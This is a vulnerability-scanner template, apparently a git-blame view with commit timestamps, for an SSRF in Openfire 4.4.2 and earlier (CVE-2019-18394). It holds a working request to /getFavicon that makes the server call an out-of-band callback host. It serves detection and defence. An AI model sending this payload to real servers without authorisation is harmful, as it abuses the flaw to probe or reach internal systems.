2021-01-02 04:59:06 +00:00
id : CVE-2019-18394
2020-08-04 15:24:23 +00:00
info :
2022-05-09 16:12:52 +00:00
name : Ignite Realtime Openfire <=4.4.2 - Server-Side Request Forgery
2021-04-09 22:19:09 +00:00
author : pdteam
2020-08-04 15:24:23 +00:00
severity : critical
2022-05-09 16:12:52 +00:00
description : Ignite Realtime Openfire through version 4.4.2 allows attackers to send arbitrary HTTP GET requests in FaviconServlet.java, resulting in server-side request forgery.
2021-08-19 12:30:14 +00:00
reference :
2021-03-30 12:10:17 +00:00
- https://swarm.ptsecurity.com/openfire-admin-console/
- https://github.com/igniterealtime/Openfire/pull/1497
2022-05-09 16:12:52 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-18394
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2019-18394
cwe-id : CWE-918
2022-04-22 10:38:41 +00:00
tags : cve,cve2019,ssrf,openfire,oast
2020-08-04 15:24:23 +00:00
requests :
- method : GET
path :
2021-07-19 12:43:09 +00:00
- "{{BaseURL}}/getFavicon?host=http://{{interactsh-url}}"
2020-08-04 15:24:23 +00:00
matchers :
- type : word
2022-02-21 18:33:16 +00:00
part : interactsh_protocol # Confirms the HTTP Interaction
2020-08-04 15:24:23 +00:00
words :
2022-02-21 18:33:16 +00:00
- "http"
2022-05-09 16:12:52 +00:00
# Enhanced by mp on 2022/05/03